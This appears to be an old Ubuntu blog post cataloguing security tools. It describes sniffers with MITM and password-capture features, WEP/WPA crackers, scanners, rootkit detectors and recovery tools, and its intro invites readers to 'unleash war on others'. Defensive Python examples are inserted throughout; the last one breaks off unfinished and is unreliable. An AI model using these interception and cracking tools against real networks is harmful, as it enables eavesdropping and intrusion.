The Top Security Tools in the Ubuntu Repositories you may not know about with 1 click Installation!
Here is a collection of security tools that you should look through to add to your arsenal to help keep the peace on your pc/network or unleash war on others for whatever reason.
You can simply install these tools by clicking on the title within firefox in Ubuntu Hardy Heron.
Most of these are command line tools which need to be invoked via the Terminal:
Applications->Accessories->Terminal
If you need help with these tools, please read the manual via `man application` in the terminal, and feel free to comment if you need a little assistance or care to add to this growing list.
Sniffers:
dsniff
Various tools to sniff network traffic for cleartext insecurities
This package contains several tools to listen to and create network traffic:
* arpspoof - Send out unrequested (and possibly forged) arp replies.
* dnsspoof - forge replies to arbitrary DNS address / pointer queries
on the Local Area Network.
* dsniff - password sniffer for several protocols.
* filesnarf - saves selected files sniffed from NFS traffic.
* macof - flood the local network with random MAC addresses.
* mailsnarf - sniffs mail on the LAN and stores it in mbox format.
* msgsnarf - record selected messages from different Instant Messengers.
* sshmitm - SSH monkey-in-the-middle; proxies and sniffs SSH traffic.
* sshow - SSH traffic analyser.
* tcpkill - kills specified in-progress TCP connections.
* tcpnice - slow down specified TCP connections via "active"
traffic shaping.
* urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
* webmitm - HTTP / HTTPS monkey-in-the-middle; transparently proxies.
* webspy - sends URLs sniffed from a client to your local browser
(requires libx11-6 installed).
Please do not abuse this software.
-
imsniff
Simple program to log Instant Messaging activity on the network
The imsniff program can be used to log IM activity on the network. It uses
libpcap to capture packets and analyzes them, logging conversation, contact
lists, etc.
Users connecting after imsniff is started can get pretty good results,
including complete contact lists and events (displaying a name change, for
example). Users already connected will be able to get the conversations, but
will miss the other information.
The only required parameter is the interface name to listen to. This can be
any interface that libpcap supports. A sample imsniff.conf.sample file is
included.
imsniff is beta software, for now, only MSN is supported. Others could follow.
Author: Carlos Fernandez
-
ksniffer
network traffic analyzer for KDE
KSniffer is a network traffic analyzer, or "sniffer" for KDE.
A sniffer is a tool used to capture packets from your network.
It detects network protocols like IP, TCP, UDP, ICMP and ARP.
-
nwatch
Network service detector
NWatch is a sniffer but can be conceptualized as a "passive port
scanner", in that it is only interested in IP traffic and it organizes
results as a port scanner would.
The advantage of this tool is that services that are open for a short
period of time can be detected with NWatch while successive nmap scans
will miss them. The disadvantage is that the services have to be actively
used to be detected.
-
scapy
Scapy is a powerful interactive packet manipulation tool, packet
generator, network scanner, network discovery, packet sniffer, etc. It
can for the moment replace hping, 85% of nmap, arpspoof, arp-sk, arping,
tcpdump, tethereal, p0f, ....
In scapy you define a set of packets, then it sends them, receives
answers, matches requests with answers and returns a list of packet couples
(request, answer) and a list of unmatched packets. This has the big advantage
over tools like nmap or hping that an answer is not reduced to
(open/closed/filtered), but is the whole packet.
Homepage: http://www.secdev.org/projects/scapy/
It was previously named scapy. This is a transitional package
so scapy users get python-scapy on upgrades. This package handles
scapy -> python-scapy. It can be safely removed.
-
Snort
Flexible Network Intrusion Detection System
Snort is a libpcap-based packet sniffer/logger which can be used as a
lightweight network intrusion detection system. It features rules
based logging and can perform content searching/matching in addition
to being used to detect a variety of other attacks and probes, such
as buffer overflows, stealth port scans, CGI attacks, SMB probes, and
much more. Snort has a real-time alerting capability, with alerts being
sent to syslog, a separate "alert" file, or even to a Windows computer
via Samba.
This package provides the plain-vanilla snort distribution and does not
provide database (available in snort-pgsql and snort-mysql) support.
-
tcpick
TCP stream sniffer and connection tracker
This libpcap-based textmode sniffer can:
* track, reassemble and reorder TCP streams
* save the captured flows in different files or display them in the terminal
* display all the stream on the terminal with different display modes like
hexdump, hexdump + ascii, only printable characters, raw mode, colorized
mode ...
* handle several network interface types, including ethernet cards and PPP
interfaces
-
Tshark
Wireshark network traffic analyzer (console interface)
Wireshark is a network traffic analyzer, or "sniffer", for Unix and
Unix-like operating systems. A sniffer is a tool used to capture
packets off the wire. Wireshark decodes numerous protocols (too many
to list).
This package provides the console version of wireshark, named
"tshark".
-
WireShark
network traffic analyzer
Wireshark is a network traffic analyzer, or "sniffer", for Unix and
Unix-like operating systems. A sniffer is a tool used to capture
packets off the wire. Wireshark decodes numerous protocols (too many
to list).
This package provides wireshark (the GTK+ version)
-
Last But not least for the sniffers is my personal fav:
Ettercap
Multipurpose sniffer/interceptor/logger for switched LAN
Ettercap supports active and passive dissection of many protocols
(even ciphered ones) and includes many features for network and host
analysis.
Data injection in an established connection and filtering (substitute
or drop a packet) on the fly is also possible, keeping the connection
synchronized.
Many sniffing modes were implemented to give you a powerful and complete
sniffing suite. It's possible to sniff in four modes: IP Based, MAC Based,
ARP Based (full-duplex) and PublicARP Based (half-duplex).
It has the ability to check whether you are in a switched LAN or
not, and to use OS fingerprints (active or passive) to let you know the
geometry of the LAN.
Wireless Tools:
aircrack-ng
Grab the latest @ www.aircrack-ng.com
wireless WEP/WPA cracking utilities
aircrack-ng is an 802.11a/b/g WEP/WPA cracking program that can recover a
40-bit, 104-bit, 256-bit or 512-bit WEP key once enough encrypted packets have
been gathered. Also it can attack WPA1/2 networks with some advanced
methods or simply by brute force.
It implements the standard FMS attack along with some optimizations,
thus making the attack much faster compared to other WEP cracking tools.
It can also fully use a multiprocessor system to its full power in order
to speed up the cracking process.
aircrack-ng is a fork of aircrack, as that project has been stopped by
the upstream maintainer.
-
Kismet
Wireless 802.11b monitoring tool
Kismet is a 802.11b wireless network sniffer. It is capable of sniffing
using almost any supported wireless card using the Airo, HostAP, Wlan-NG,
and Orinoco (with a kernel patch) drivers.
It can make use of sox and festival to play audio alarms for network events
and speak out network summary on discovery. Optionally works with gpsd
to map scanning.
-
Prismstumbler
Wireless network sniffer
Prismstumbler is a packet sniffer for 802.11b wireless LANs.
-
SWScanner
Simple Wireless Scanner
SWScanner is a KDE application specially designed to make the whole
wardriving process easy, but also intended to facilitate many tasks related
to wireless networks. SWScanner is compatible with NetStumbler files and
supports GPS devices.
-
WEPLab
tool designed to break WEP keys
WepLab is a tool designed to teach how WEP works, what different
vulnerabilities it has, and how they can be used in practice to
break a WEP protected wireless network.
WepLab can dump network traffic, analyse it or crack the WEP key.
-
Portscanning:
NMAP
The Network Mapper
Nmap is a utility for network exploration or security auditing. It
supports ping scanning (determine which hosts are up), many port
scanning techniques, version detection (determine service protocols
and application versions listening behind ports), and TCP/IP
fingerprinting (remote host OS or device identification). Nmap also
offers flexible target and port specification, decoy/stealth scanning,
sunRPC scanning, and more. Most Unix and Windows platforms are
supported in both GUI and commandline modes. Several popular handheld
devices are also supported, including the Sharp Zaurus and the iPAQ.
-
PnScan
Multi threaded port scanner
Pnscan is a multi threaded port scanner that can scan a large network
very quickly. It does not have all the features that nmap has, but
it is much faster.
-
DoScan
port scanner for discovering services on large networks
doscan is a tool to discover TCP services on your network. It is
designed for scanning a single port on a large network. doscan
contacts many hosts in parallel, using standard TCP sockets provided
by the operating system. It is possible to send strings to remote
hosts, and collect the banners they return.
There are better tools for scanning many ports on a small set of
hosts, for example nmap.
-
HPING3
Active Network Smashing Tool
hping3 is a network tool able to send custom ICMP/UDP/TCP packets and
to display target replies like ping does with ICMP replies. It handles
fragmentation and arbitrary packet body and size, and can be used to
transfer files under supported protocols. Using hping3, you can test
firewall rules, perform (spoofed) port scanning, test network
performance using different protocols, do path MTU discovery, perform
traceroute-like actions under different protocols, fingerprint remote
operating systems, audit TCP/IP stacks, etc. hping3 is scriptable
using the TCL language.
-
Paketto
Unusual TCP/IP testing tools
The Paketto Keiretsu is a collection of tools that use new and unusual
strategies for manipulating TCP/IP networks. scanrand is said to be
faster than nmap and more useful in some scenarios.
This package includes:
* scanrand, a very fast port, host, and network trace scanner
* minewt, a user space NAT/MAT (MAC Address Translation) gateway
* linkcat(lc), that provides direct access to the network (Level 2)
* paratrace, a "traceroute"-like tool using existing TCP connections
* phentropy, that plots a large data source onto a 3D matrix
-
Packit
Network Injection and Capture
Packit is a network auditing tool. Its value is derived from its ability
to customize, inject, monitor, and manipulate IP traffic. By allowing you
to define (spoof) nearly all TCP, UDP, ICMP, IP, ARP, RARP, and Ethernet
header options, Packit can be useful in testing firewalls, intrusion
detection systems, port scanning, simulating network traffic, and general
TCP/IP auditing. Packit is also an excellent tool for learning TCP/IP.
-
ScanSSH
get SSH server versions for an entire network
The ScanSSH protocol scanner scans a list of addresses and networks for
running SSH protocol servers and their version numbers. Version 2.0 adds
support for scanning arbitrary ports and specifically open proxies. The
ScanSSH protocol scanner supports random selection of IP addresses from
large network ranges and is useful for gathering statistics on the
deployment of SSH protocol servers in a company or the Internet as a whole.
-
p0f
Passive OS fingerprinting tool
p0f performs passive OS detection based on SYN packets. Unlike nmap
and queso, p0f does recognition without sending any data.
Additionally, it is able to determine the distance to the remote
host, and can be used to determine the structure of a foreign or
local network. When running on the gateway of a network it is able
to gather huge amounts of data and provide useful statistics. On a
user-end computer it could be used as powerful IDS add-on. p0f
supports full tcpdump-style filtering expressions, and has an
extensible and detailed fingerprinting database.
-
Misc Tools:
TCPTraceroute
A traceroute implementation using TCP packets
The more traditional traceroute(8) sends out either UDP or ICMP ECHO
packets with a TTL of one, and increments the TTL until the destination
has been reached. By printing the gateways that generate ICMP time
exceeded messages along the way, it is able to determine the path packets
are taking to reach the destination.
The problem is that with the widespread use of firewalls on the modern
Internet, many of the packets that traceroute(8) sends out end up being
filtered, making it impossible to completely trace the path to the
destination. However, in many cases, these firewalls will permit inbound
TCP packets to specific ports that hosts sitting behind the firewall are
listening for connections on. By sending out TCP SYN packets instead of
UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common
firewall filters.
Traceroute
Traces the route taken by packets over an IPv4/IPv6 network
The traceroute utility displays the route used by IP packets on their way to a
specified network (or Internet) host. Traceroute displays the IP number and
host name (if possible) of the machines along the route taken by the packets.
Traceroute is used as a network debugging tool. If you're having network
connectivity problems, traceroute will show you where the trouble is coming
from along the route.
Install traceroute if you need a tool for diagnosing network connectivity
problems.
Homepage:
Whois
the GNU whois client
This is a new whois (RFC 3912) client rewritten from scratch.
It is inspired from and compatible with the usual BSD and RIPE whois(1)
programs.
It is intelligent and can automatically select the appropriate whois
server for most queries.
The package also contains mkpasswd, a simple front end to crypt(3).
-
Rootkit Detection:
Chkrootkit
Checks for signs of rootkits on the local system
chkrootkit identifies whether the target computer is infected with a rootkit.
Some of the rootkits that chkrootkit identifies are:
1. lrk3, lrk4, lrk5, lrk6 (and some variants);
2. Solaris rootkit;
3. FreeBSD rootkit;
4. t0rn (including latest variant);
5. Ambient's Rootkit for Linux (ARK);
6. Ramen Worm;
7. rh[67]-shaper;
8. RSHA;
9. Romanian rootkit;
10. RK17;
11. Lion Worm;
12. Adore Worm.
Please note that this is not a definitive test, it does not ensure that the
target has not been cracked. In addition to running chkrootkit, one should
perform more specific tests.
-
RkHunter
rootkit, backdoor, sniffer and exploit scanner
Rootkit Hunter scans systems for known and unknown rootkits,
backdoors, sniffers and exploits.
It checks for:
- MD5 hash changes;
- files commonly created by rootkits;
- executables with anomalous file permissions;
- suspicious strings in kernel modules;
- hidden files in system directories;
and can optionally scan within files.
Using rkhunter alone does not guarantee that a system is not
compromised. Running additional tests, such as chkrootkit, is
recommended.
-
UnHide
Forensic tool to find hidden processes and ports
Unhide is a forensic tool to find processes and TCP/UDP ports hidden by
rootkits, Linux kernel modules or by other techniques. It includes two
utilities: unhide and unhide-tcp.
unhide detects hidden processes using three techniques:
- comparing the output of /proc and /bin/ps
- comparing the information gathered from /bin/ps with the one gathered
from system calls (syscall scanning)
- full scan of the process ID space (PIDs bruteforcing)
unhide-tcp identifies TCP/UDP ports that are listening but are not listed in
/bin/netstat through brute forcing of all TCP/UDP ports available.
This package can be used by rkhunter in its daily scans.
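The three techniques the unhide description lists can be reproduced in a few dozen lines. The following is an added example written for this post, not code from the unhide project: it compares the PIDs visible in /proc against the PIDs `ps` reports, and brute-forces the PID space with `kill(pid, 0)`. The `ps -eo pid` invocation and the use of /proc/&lt;pid&gt;/status to tell threads from processes are assumptions about a Linux host; the sample PID sets at the top are constructed.

```python
import os
import subprocess

# Constructed sample data for the offline comparison (not real output from any host).
SAMPLE_PROC_PIDS = {1, 2, 100, 4242}
SAMPLE_PS_OUTPUT = "  PID\n    1\n    2\n  100\n"


def parse_ps_pids(ps_output):
    """Extract PIDs from `ps -eo pid` output; the header line is skipped."""
    return {int(tok) for tok in ps_output.split() if tok.isdigit()}


def list_proc_pids():
    """PIDs visible as numeric directories under /proc (technique 1, first half)."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def list_ps_pids():
    """PIDs that /bin/ps reports (technique 1, second half)."""
    out = subprocess.run(["ps", "-eo", "pid"], capture_output=True, text=True, check=True).stdout
    return parse_ps_pids(out)


def hidden_proc_vs_ps(proc_pids, ps_pids):
    """Technique 1: a PID that has a /proc entry but that ps does not list."""
    return sorted(proc_pids - ps_pids)


def is_thread(pid):
    """A PID whose Tgid differs from its Pid is a thread, not a process. kill() accepts
    thread IDs, so the brute-force pass must skip them or every thread looks 'hidden'."""
    try:
        with open(f"/proc/{pid}/status") as f:
            fields = dict(line.split(":", 1) for line in f if ":" in line)
        return int(fields["Tgid"]) != int(fields["Pid"])
    except (OSError, KeyError, ValueError):
        return False


def bruteforce_pids(ps_pids, max_pid=None):
    """Technique 3: probe every PID with kill(pid, 0). EPERM still means the PID exists.
    Anything alive that ps does not show (and is not a thread) is reported."""
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except PermissionError:
            pass  # exists, owned by someone else
        except ProcessLookupError:
            continue  # no such PID
        if not is_thread(pid):
            alive.add(pid)
    return sorted(alive - ps_pids)


def self_visible():
    """Sanity check for the live half: our own PID must appear in /proc."""
    return not os.path.isdir("/proc") or os.getpid() in list_proc_pids()


if __name__ == "__main__":
    ps = list_ps_pids()
    print("in /proc but not in ps:", hidden_proc_vs_ps(list_proc_pids(), ps))
    print("alive but not in ps:   ", bruteforce_pids(ps))
```

A PID that shows up in the second list but not the first is the interesting case: something answers `kill()` yet has no /proc directory, which is what an LKM rootkit hiding a process from readdir looks like. Short-lived processes that exit between the `ps` snapshot and the probe also land there, so unhide re-checks before reporting; run the scan twice before believing a single hit.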
-
Secure Erase:
wipe
Secure file deletion
Recovery of supposedly erased data from magnetic media is easier than what many
people would like to believe. A technique called Magnetic Force Microscopy
(MFM) allows any moderately funded opponent to recover the last two or three
layers of data written to disk. Wipe repeatedly writes special patterns to the
files to be destroyed, using the fsync() call and/or the O_SYNC bit to force
disk access.
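What "repeatedly writes special patterns ... using fsync() and/or O_SYNC" amounts to in code, as an added example for this post rather than wipe's own pass schedule: open the file with O_SYNC, overwrite it once per pattern, fsync() after each pass, then unlink. The four-pattern list is a constructed choice for the example. One caveat worth more than the pattern count: overwriting in place only reaches the original blocks on a filesystem that rewrites in place; ext3 in data=journal mode, copy-on-write filesystems and flash with wear levelling may leave the old data elsewhere.

```python
import os
import tempfile

# Overwrite passes used by this example (constructed; wipe's own schedule is longer).
PATTERNS = [b"\x00", b"\xff", b"\x55", b"\xaa"]


def wipe_file(path, patterns=PATTERNS, chunk=64 * 1024):
    """Overwrite `path` in place once per pattern, forcing each pass to disk with O_SYNC
    and fsync(), then unlink it. Returns the total number of bytes written."""
    size = os.path.getsize(path)
    written = 0
    fd = os.open(path, os.O_WRONLY | os.O_SYNC)
    try:
        for pat in patterns:
            os.lseek(fd, 0, os.SEEK_SET)  # every pass starts at offset 0
            remaining = size
            while remaining > 0:
                block = pat * min(chunk, remaining)
                n = os.write(fd, block)
                remaining -= n
                written += n
            os.fsync(fd)  # do not start the next pattern until this one is on disk
    finally:
        os.close(fd)
    os.unlink(path)
    return written


def demo(size=1000):
    """Constructed scenario: create a temp file of `size` bytes, wipe it, report the result."""
    fd, path = tempfile.mkstemp(prefix="wipe-demo-")
    with os.fdopen(fd, "wb") as f:
        f.write(b"secret " * (size // 7) + b"x" * (size % 7))
    written = wipe_file(path)
    return written, os.path.exists(path)


if __name__ == "__main__":
    print(demo())
```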
-
Undelete/Recovery:
Foremost
Forensics application to recover data
This is a console program to recover files based on their headers and
footers for forensics purposes.
Foremost can work on disk image files, such as those generated by dd,
Safeback, Encase, etc, or directly on a drive. The headers and footers
are specified by a configuration file, so you can pick and choose which
headers you want to look for.
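Header/footer carving, the technique Foremost's description refers to, is simple enough to show end to end. Below is an added example for this post (not Foremost's code): a signature table in the spirit of foremost.conf, a carver that walks an image looking for each header and the next footer within a size cap, and a constructed "disk image" with a JPEG-like and a PNG-like blob buried in filler. The JPEG and PNG magic bytes are the real ones; the GIF entry is there to show the table generalises, and the sample image is constructed, not a real capture.

```python
import mmap
import os
import tempfile

# Header/footer pairs in the spirit of foremost.conf; max_size bounds a carve when
# no footer follows. The GIF entry has no sample below and simply finds nothing.
SIGNATURES = {
    "jpg": {"header": b"\xff\xd8\xff", "footer": b"\xff\xd9", "max_size": 20 * 1024 * 1024},
    "png": {"header": b"\x89PNG\r\n\x1a\n", "footer": b"IEND\xaeB`\x82", "max_size": 20 * 1024 * 1024},
    "gif": {"header": b"GIF8", "footer": b"\x00;", "max_size": 5 * 1024 * 1024},
}


def carve(image, signatures=SIGNATURES):
    """Return carved objects as dicts sorted by offset. `image` is bytes or an mmap."""
    found = []
    for ftype, sig in signatures.items():
        pos = 0
        while True:
            start = image.find(sig["header"], pos)
            if start < 0:
                break
            limit = min(len(image), start + sig["max_size"])
            end = image.find(sig["footer"], start + len(sig["header"]), limit)
            if end < 0:
                pos = start + 1  # header with no footer inside max_size: skip this hit
                continue
            end += len(sig["footer"])
            found.append({"type": ftype, "offset": start, "size": end - start, "data": image[start:end]})
            pos = end  # resume after the carved object, not inside it
    return sorted(found, key=lambda f: f["offset"])


def carve_file(path):
    """Carve a raw image (e.g. one made with dd) without reading it all into memory."""
    with open(path, "rb") as f, mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as m:
        return carve(m)


def write_carved(found, outdir):
    """Write each carved object to outdir/NNNNNNNN.type; returns the paths written."""
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for n, f in enumerate(found):
        p = os.path.join(outdir, f"{n:08d}.{f['type']}")
        with open(p, "wb") as fh:
            fh.write(f["data"])
        paths.append(p)
    return paths


def build_sample_image():
    """Constructed image: 1 KiB of filler, a JPEG-shaped blob, filler, a PNG-shaped blob, filler.
    The filler never contains any of the signatures above."""
    filler = bytes(range(256)) * 4
    jpeg = b"\xff\xd8\xff\xe0" + b"JFIF-CONSTRUCTED" + b"\xff\xd9"
    png = b"\x89PNG\r\n\x1a\n" + b"IHDR-CONSTRUCTED" + b"IEND\xaeB`\x82"
    return filler + jpeg + filler + png + filler


def carve_sample_to_tempdir():
    outdir = tempfile.mkdtemp(prefix="carved-")
    return write_carved(carve(build_sample_image()), outdir)


if __name__ == "__main__":
    for f in carve(build_sample_image()):
        print(f["type"], "at", f["offset"], "size", f["size"])
```

Two things the example makes visible that the description only implies: carving needs no filesystem metadata at all, which is why it works on a drive whose directory structure is gone, and a footer search is only as good as the format's footer (a JPEG body escapes 0xFF as 0xFF 0x00, so `\xff\xd9` is reliable there; formats without a distinct footer are why the size cap exists).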
-
e2undel
Undelete utility for the ext2 file system
Interactive console tool to recover the data of deleted files on
an ext2 file system under Linux. It does not require knowledge
about how ext2 file systems work and should be usable by
most people.
This tool searches all inodes marked as deleted on a file system and
lists them as sorted by owner and time of deletion. Additionally,
it gives you the file size and tries to determine the file type in
the way file(1) does. If you did not just delete a whole bunch of
files with a 'rm -r *', this information should be helpful to find
out which of the deleted files you would like to recover.
E2undel will not work on ext3 (journaling) filesystems.
Homepage: http://e2undel.sourceforge.net
-
Recover
Undelete files on ext2 partitions
Recover automates some steps as described in the ext2-undeletion
howto. This means it seeks all the deleted inodes on your hard drive
with debugfs. When all the inodes are indexed, recover asks you some
questions about the deleted file. These questions are:
* Hard disk device name
* Year of deletion
* Month of deletion
* Weekday of deletion
* First/Last possible day of month
* Min/Max possible file size
* Min/Max possible deletion hour
* Min/Max possible deletion minute
* User ID of the deleted file
* A text string the file included (can be ignored)
If recover found any fitting inodes, it asks to give a directory name
and dumps the inodes into the directory. Finally it asks you if you
want to filter the inodes again (in case you typed some wrong
answers).
Note that recover works only with ext2 filesystems - it does not support
ext3.
http://recover.sourceforge.net/linux/recover/
-
Port Scan Detection:
PSAD
The Port Scan Attack Detector
PSAD is a collection of four lightweight system daemons written in
Perl and in C that are designed to work with Linux firewalling code
(iptables in the 2.4.x kernels, and ipchains in the 2.2.x kernels)
to detect port scans. It features a set of highly configurable danger
thresholds (with sensible defaults provided), verbose alert messages
that include the source, destination, scanned port range, begin and
end times, tcp flags and corresponding nmap options (Linux 2.4.x
kernels only), reverse DNS info, email alerting, and automatic
blocking of offending ip addresses via dynamic configuration of
ipchains/iptables firewall rulesets.
In addition, for the 2.4.x kernels psad incorporates many
of the tcp signatures included in Snort to detect highly suspect scans
for:
* various backdoor programs (e.g. EvilFTP, GirlFriend, SubSeven)
* DDoS tools (mstream, shaft)
* advanced port scans (syn, fin, xmas) such as those made with nmap
Homepage: http://www.cipherdyne.org/
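To make concrete what psad does with the iptables log, here is an added example for this post (not psad's code) that parses iptables LOG lines, keeps a 60 second sliding window per source address, counts distinct destination ports, assigns a danger level and names the scan type from the TCP flags (SYN, FIN, xmas, null) the way the description says psad does. The log lines are constructed in the kernel's LOG format with documentation addresses; the danger thresholds are assumed values for the example, not psad's defaults.

```python
import re
from collections import defaultdict
from datetime import datetime

# Fields an iptables LOG target writes into the kernel log.
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) .*?PROTO=(?P<proto>\w+)"
    r"(?: SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+))?(?P<rest>.*)$"
)
TCP_FLAGS = ("SYN", "ACK", "FIN", "RST", "PSH", "URG")
WINDOW_SECONDS = 60
# (distinct ports hit, danger level): assumed thresholds for this example, not psad's.
DANGER_THRESHOLDS = [(50, 3), (15, 2), (5, 1)]


def parse_line(line, year=2008):
    """Return a dict for a TCP/UDP LOG line, or None for anything else (e.g. ICMP)."""
    m = LOG_RE.match(line)
    if not m or m.group("dpt") is None:
        return None
    ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
    flags = frozenset(f for f in TCP_FLAGS if re.search(rf"\b{f}\b", m.group("rest")))
    return {"ts": ts, "src": m.group("src"), "dst": m.group("dst"),
            "proto": m.group("proto"), "dpt": int(m.group("dpt")), "flags": flags}


def classify(flags):
    """Name the probe from its TCP flag combination, matching the nmap-style labels."""
    if flags == {"SYN"}:
        return "syn"
    if flags == {"FIN"}:
        return "fin"
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"
    if not flags:
        return "null"
    return "other"


def detect_scans(lines, window=WINDOW_SECONDS):
    """Per source, find the `window`-second span with the most distinct destination
    ports and alert when that count reaches a danger threshold."""
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        best, start = [], 0
        for end in range(len(evs)):
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window:
                start += 1
            if len({e["dpt"] for e in evs[start:end + 1]}) > len({e["dpt"] for e in best}):
                best = evs[start:end + 1]
        ports = sorted({e["dpt"] for e in best})
        level = next((lvl for n, lvl in DANGER_THRESHOLDS if len(ports) >= n), 0)
        if level:
            alerts.append({
                "src": src, "dst": best[0]["dst"], "level": level,
                "port_count": len(ports), "port_range": (ports[0], ports[-1]),
                "begin": best[0]["ts"].isoformat(), "end": best[-1]["ts"].isoformat(),
                "scan_types": sorted({classify(e["flags"]) for e in best if e["proto"] == "TCP"}),
            })
    return alerts


def _log(ts, src, dpt, flags):
    """Constructed line in iptables LOG format (documentation addresses, no real host)."""
    return (f"{ts} fw kernel: [  100.000000] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 "
            f"SRC={src} DST=198.51.100.5 LEN=44 TOS=0x00 PREC=0x00 TTL=48 ID=1 PROTO=TCP "
            f"SPT=40000 DPT={dpt} WINDOW=1024 RES=0x00 {flags} URGP=0")


SAMPLE_LOG = (
    [_log(f"Jun 12 10:00:{i:02d}", "192.0.2.10", p, "SYN")            # SYN sweep of 8 ports
     for i, p in enumerate([21, 22, 23, 25, 80, 110, 143, 443])]
    + [_log(f"Jun 12 10:05:{i:02d}", "198.18.0.9", p, "FIN PSH URG")  # xmas probes
       for i, p in enumerate([22, 80, 443, 3306, 5432, 8080])]
    + [_log(f"Jun 12 10:1{i}:00", "203.0.113.7", 80, "SYN") for i in range(3)]  # normal client
    + ["Jun 12 10:20:00 fw kernel: [  200.0] IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.5 "
       "LEN=84 TOS=0x00 PREC=0x00 TTL=48 ID=2 PROTO=ICMP TYPE=8 CODE=0 ID=1 SEQ=1"]
)

if __name__ == "__main__":
    for a in detect_scans(SAMPLE_LOG):
        print(a)
```

The client that hits port 80 three times never crosses the threshold because the count is of distinct ports, not packets; that distinction is what keeps a busy legitimate host from tripping an alert while a slow sweep of one port a second still does. Feeding this real data only needs an iptables rule with `-j LOG` ahead of the DROP so the kernel writes the lines in the first place.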
-
PortSentry
Portscan detection daemon
PortSentry has the ability to detect portscans (including stealth scans) on
the network interfaces of your machine. Upon alarm it can block the
attacker via hosts.deny, dropped route or firewall rule. It is part of the
Abacus program suite.
Note: If you have no idea what a port/stealth scan is, it's recommended to
have a look at http://sf.net/projects/sentrytools/ before installing this
package. Otherwise you might easily block hosts you'd better not (e.g. your
NFS-server, name-server, etc.).
-
Snort
Flexible Network Intrusion Detection System
Snort is a libpcap-based packet sniffer/logger which can be used as a
lightweight network intrusion detection system. It features rules
based logging and can perform content searching/matching in addition
to being used to detect a variety of other attacks and probes, such
as buffer overflows, stealth port scans, CGI attacks, SMB probes, and
much more. Snort has a real-time alerting capability, with alerts being
sent to syslog, a separate "alert" file, or even to a Windows computer
via Samba.
This package provides the plain-vanilla snort distribution and does not
provide database (available in snort-pgsql and snort-mysql) support.
-
Privilege escalation detection:
Ninja
Ninja is a privilege escalation detection and prevention
system for GNU/Linux hosts. While running, it will monitor
process activity on the local host, and keep track of all
processes running as root. If a process is spawned with
UID or GID zero (root), ninja will log necessary information
about this process, and optionally kill the process
if it was spawned by an unauthorized user.
A "magic" group can be specified, allowing members of this
group to run any setuid/setgid root executable.
Individual executables can be whitelisted. Ninja uses a
fine grained whitelist that lets you whitelist executables
on a group and/or user basis. This can be used to allow
specific groups or individual users access to setuid/setgid
root programs, such as su(1) and passwd(1).
Homepage: http://forkbomb.org/ninja
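The rule Ninja enforces, stated as code: a process with effective UID or GID 0 whose parent runs as an ordinary user is suspect unless its executable is whitelisted or the parent's user is in the "magic" group. The following is an added example for this post, not Ninja's code, and it polls /proc instead of monitoring continuously as Ninja does. The /proc/&lt;pid&gt;/status excerpts and exe paths at the top are constructed; the group name "wheel" and the whitelist paths in `scan_live` are assumptions to adjust for your host.

```python
import grp
import os
import pwd

# Constructed /proc/<pid>/status excerpts: init, a user shell, su started from it, and an
# unknown root process started from the same shell (no real host).
SAMPLE_STATUS = [
    "Name:\tinit\nPid:\t1\nPPid:\t0\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\n",
    "Name:\tbash\nPid:\t1000\nPPid:\t1\nUid:\t1000\t1000\t1000\t1000\nGid:\t1000\t1000\t1000\t1000\n",
    "Name:\tsu\nPid:\t1001\nPPid:\t1000\nUid:\t1000\t0\t0\t0\nGid:\t1000\t1000\t1000\t1000\n",
    "Name:\tevil\nPid:\t1002\nPPid:\t1000\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\n",
]
SAMPLE_EXES = {1: "/sbin/init", 1000: "/bin/bash", 1001: "/bin/su", 1002: "/tmp/evil"}


def parse_status(text):
    """Parse the 'Key:\\tvalue' lines of /proc/<pid>/status. Uid/Gid hold real,
    effective, saved and fs ids; the first two are what matter here."""
    info = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            info[key.strip()] = value.strip()
    uid, gid = info["Uid"].split(), info["Gid"].split()
    return {"name": info.get("Name"), "pid": int(info["Pid"]), "ppid": int(info["PPid"]),
            "uid": int(uid[0]), "euid": int(uid[1]), "gid": int(gid[0]), "egid": int(gid[1])}


def magic_group_uids(group_name):
    """UIDs of the members of the group whose users may run setuid/setgid root programs."""
    try:
        members = grp.getgrnam(group_name).gr_mem
    except KeyError:
        return frozenset()
    uids = set()
    for user in members:
        try:
            uids.add(pwd.getpwnam(user).pw_uid)
        except KeyError:
            pass
    return frozenset(uids)


def suspicious_root_processes(procs, exes, magic_uids=frozenset(), whitelist=frozenset()):
    """procs: {pid: parsed status}; exes: {pid: exe path}. Flags processes with effective
    UID or GID 0 whose parent's real UID is not root, unless that UID is in the magic
    group or the executable is whitelisted."""
    alerts = []
    for pid, p in procs.items():
        if p["euid"] != 0 and p["egid"] != 0:
            continue
        parent = procs.get(p["ppid"])
        if parent is None or parent["uid"] == 0:
            continue  # spawned by root (or by a parent we cannot see): not a privilege gain
        if parent["uid"] in magic_uids or exes.get(pid) in whitelist:
            continue
        alerts.append({"pid": pid, "name": p["name"], "exe": exes.get(pid),
                       "spawned_by_uid": parent["uid"]})
    return alerts


def scan_live(magic_group="wheel",
              whitelist=frozenset({"/bin/su", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/sudo"})):
    """Walk /proc once and apply the rule. Reading another user's exe link needs root;
    when that fails the process is still checked, with exe recorded as None."""
    procs, exes = {}, {}
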